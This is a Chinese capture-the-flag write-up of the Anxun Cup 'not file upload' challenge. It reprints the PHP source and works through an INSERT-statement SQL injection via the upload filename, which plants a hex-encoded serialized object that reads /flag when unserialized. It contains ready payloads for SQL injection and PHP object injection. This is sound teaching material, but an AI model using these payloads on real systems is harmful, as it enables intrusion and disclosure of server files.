[安洵杯-不是文件上传]代码审计+文件上传+insert注入

文章目录

    • [安洵杯-不是文件上传]代码审计+文件上传+insert注入
      • mysql特性

[安洵杯-不是文件上传]代码审计+文件上传+insert注入

首页是一个文件上传页面

[安洵杯-不是文件上传]代码审计+文件上传+insert注入_第1张图片

测试只能上传图片,是白名单

题目给出了源码:

upload.php

<!DOCTYPE html>
<html>
<head>
    <title>Image Upload</title>
    <link rel="stylesheet" href="./style.css">
    <meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
</head>
<body>
<p align="center"><img src="https://i.loli.net/2019/10/06/i5GVSYnB1mZRaFj.png" width=300 length=150></p>
<div align="center">
    <form name="upload" action="" method="post" enctype="multipart/form-data">
        <input type="file" name="file">
        <input type="Submit" value="submit">
    </form>
</div>

<br>
<p><a href="./show.php">You can view the pictures you uploaded here</a></p>
<br>

<?php
include("./helper.php");

class upload extends helper
{
    public function upload_base()
    {
        $this->upload();
    }
}

if ($_FILES) {
    if ($_FILES["file"]["error"]) {
        die("Upload file failed.");
    } else {
        $file = new upload();
        $file->upload_base();
    }
}

$a = new helper();
?>
</body>
</html>

show.php

<!DOCTYPE html>
<html>
<head>
	<title>Show Images</title>
	<link rel="stylesheet" href="./style.css">
	<meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
</head>
<body>

<h2 align="center">Your images</h2>
<p>The function of viewing the image has not been completed, and currently only the contents of your image name can be saved. I hope you can forgive me and my colleagues and I are working hard to improve.</p>
<hr>

<?php
include("./helper.php");
$show = new show();
if($_GET["delete_all"]){
	if($_GET["delete_all"] == "true"){
		$show->Delete_All_Images();
	}
}
$show->Get_All_Images();

class show{
	public $con;

	public function __construct(){
		$this->con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");
		if (mysqli_connect_errno($this->con)){
   			die("Connect MySQL Fail:".mysqli_connect_error());
		}
	}

	public function Get_All_Images(){
		$sql = "SELECT * FROM images";
		$result = mysqli_query($this->con, $sql);
		if ($result->num_rows > 0){
		    while($row = $result->fetch_assoc()){
		    	if($row["attr"]){
		    		$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
					$attr = unserialize($attr_temp);
				}
		        echo "

id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."

"
; } }else{ echo "

You have not uploaded an image yet.

"
; } mysqli_close($this->con); } public function Delete_All_Images(){ $sql = "DELETE FROM images"; $result = mysqli_query($this->con, $sql); } } ?> <p><a href="show.php?delete_all=true">Delete All Images</a></p> <p><a href="upload.php">Upload Images</a></p> </body> </html>

helper.php


class helper {
	protected $folder = "pic/";
	protected $ifview = False;
	protected $config = "config.txt";
	// The function is not yet perfect, it is not open yet.

	public function upload($input="file")
	{
		$fileinfo = $this->getfile($input);
		$array = array();
		$array["title"] = $fileinfo['title'];
		$array["filename"] = $fileinfo['filename'];
		$array["ext"] = $fileinfo['ext'];
		$array["path"] = $fileinfo['path'];
		$img_ext = getimagesize($_FILES[$input]["tmp_name"]);
		$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
		$array["attr"] = serialize($my_ext);
		$id = $this->save($array);
		if ($id == 0){
			die("Something wrong!");
		}
		echo "
"
; echo "

Your images is uploaded successfully. And your image's id is $id.

"
; } public function getfile($input) { if(isset($input)){ $rs = $this->check($_FILES[$input]); } return $rs; } public function check($info) { $basename = substr(md5(time().uniqid()),9,16); $filename = $info["name"]; $ext = substr(strrchr($filename, '.'), 1); $cate_exts = array("jpg","gif","png","jpeg"); if(!in_array($ext,$cate_exts)){ die("

Please upload the correct image file!!!

"
); } $title = str_replace(".".$ext,'',$filename); return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext); } public function save($data) { if(!$data || !is_array($data)){ die("Something wrong!"); } $id = $this->insert_array($data); return $id; } public function insert_array($data) { $con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base"); if (mysqli_connect_errno($con)) { die("Connect MySQL Fail:".mysqli_connect_error()); } $sql_fields = array(); $sql_val = array(); foreach($data as $key=>$value){ $key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key); $value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value); $sql_fields[] = "`".$key_temp."`"; $sql_val[] = "'".$value_temp."'"; } $sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")"; mysqli_query($con, $sql); $id = mysqli_insert_id($con); mysqli_close($con); return $id; } public function view_files($path){ if ($this->ifview == False){ return False; //The function is not yet perfect, it is not open yet. } $content = file_get_contents($path); echo $content; } function __destruct(){ # Read some config html $this->view_files($this->config); } } ?>

这里的重点是helper.php

在upload()函数中,会将相关信息保存在$array数组中,注意到有一个地方被序列化了:$array["attr"] = serialize($my_ext); ,然后经过相关的检查会将$array数组插入到mysql数据库中去

我们分析一下:

public function view_files($path){
		if ($this->ifview == False){
			return False;
			//The function is not yet perfect, it is not open yet.
		}
		$content = file_get_contents($path);
		echo $content;
	}

function __destruct(){
    # Read some config html
    $this->view_files($this->config);
}

如果$this->config=/flag,并且$this->ifview=true的话,当helper对象会序列化就会读取flag的内容,并且输出,这是利用点。但默认值读不了flag,怎么读?

我们需要构造一个特定值序列化后的串,然后经过unserialize(),当对象销毁就会输出flag

哪里有反序列化函数?在show.php的Get_All_Images():

public function Get_All_Images(){
		$sql = "SELECT * FROM images";
		$result = mysqli_query($this->con, $sql);
		if ($result->num_rows > 0){
		    while($row = $result->fetch_assoc()){
		    	if($row["attr"]){
		    		$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
					$attr = unserialize($attr_temp);
				}
		        echo "

id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."

"
; } }else{ echo "

You have not uploaded an image yet.

"
; } mysqli_close($this->con); }

这个函数会将传入的数组中的attr属性的值先替换一下然后反序列化,这个属性就是helper.php$array['attr']经过序列化后的值,所以我们需要构造一下,将该值替换为恶意构造的序列化串

但是$array["attr"]默认的值是图片的宽高数组序列化后的值,没法控制输入

$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
$array["attr"] = serialize($my_ext);

怎么才能将自己的序列化串插入呢?我们注意到insert_array()函数

public function insert_array($data)
	{
		...
		foreach($data as $key=>$value){
			$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
			$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
			$sql_fields[] = "`".$key_temp."`";
			$sql_val[] = "'".$value_temp."'";
		}
		$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
		...
		return $id;
	}

在这个函数中会执行sql语句,将输入插入到字符串,但是这里存在insert注入

我们查看check()函数:

public function check($info)
	{
		$basename = substr(md5(time().uniqid()),9,16);
		$filename = $info["name"];
		$ext = substr(strrchr($filename, '.'), 1);
		$cate_exts = array("jpg","gif","png","jpeg");
		if(!in_array($ext,$cate_exts)){
			die("

Please upload the correct image file!!!

"
); } $title = str_replace(".".$ext,'',$filename); return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext); }

这里的$title$filename传入,并且没有经过任何过滤,所以可以从这里入手,构造成这种格式:

tit','fn','.png','path','O:{yy}'),('title.png
即:
insert into images (`title`,`filename`,`ext`,`path`,`attr`)  values('tit','fn','.png','path','O:{yy}'),('title.png')

这个序列化串如何构造呢?



class helper
{
    protected $folder = "pic/";
    protected $ifview = true;
    protected $config = "/flag";
}

$a = new helper();
echo serialize($a);

# O:6:"helper":3:{s:9:" * folder";s:4:"pic/";s:9:" * ifview";b:1;s:9:" * config";s:5:"/flag";}

image-20230731131038333

但是这里不能直接传入,因为变量是protected类型经过序列化后会加上%00

我们注意到之前insert_array()经过了替换:

$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);

所以我们替换成:

O:6:"helper":3:{s:9:"\0\0\0folder";s:4:"pic/";s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}

总的filename就是:

tit','fn','.png','path','O:6:"helper":3:{s:9:"\0\0\0folder";s:4:"pic/";s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}'),('title.png

但是传过去发现无效,因为文件名双引号"冲突了,我们可以将其转化为16进制:

O:6:"helper":3:{s:9:"\0\0\0folder";s:4:"pic/";s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}

0x4f3a363a2268656c706572223a333a7b733a393a225c305c305c30666f6c646572223b733a343a227069632f223b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d

总的filename:

tit','fn','.png','path',0x4f3a363a2268656c706572223a333a7b733a393a225c305c305c30666f6c646572223b733a343a227069632f223b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d),('title.png

[安洵杯-不是文件上传]代码审计+文件上传+insert注入_第2张图片

访问一下show.php,就会反序列化,输出flag:

[安洵杯-不是文件上传]代码审计+文件上传+insert注入_第3张图片

mysql特性

这里有些同学会有些疑惑,为什么我们插入到数据库中的是序列化串的16进制形式:

0x4f3a363a2268656c706572223a333a7b733a393a225c305c305c30666f6c646572223b733a343a227069632f223b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d

为什么后面反序列化还能成功?

这是因为利用了mysql的特性

当mysql中插入一个16进制的值时会自动将其转化为字符串

如图成功转为字符串,所以我们插入16进制就会转为字符串插入到数据库,这样取出来就可以成功反序列化啦

你可能感兴趣的:(wp,安全,web安全,php)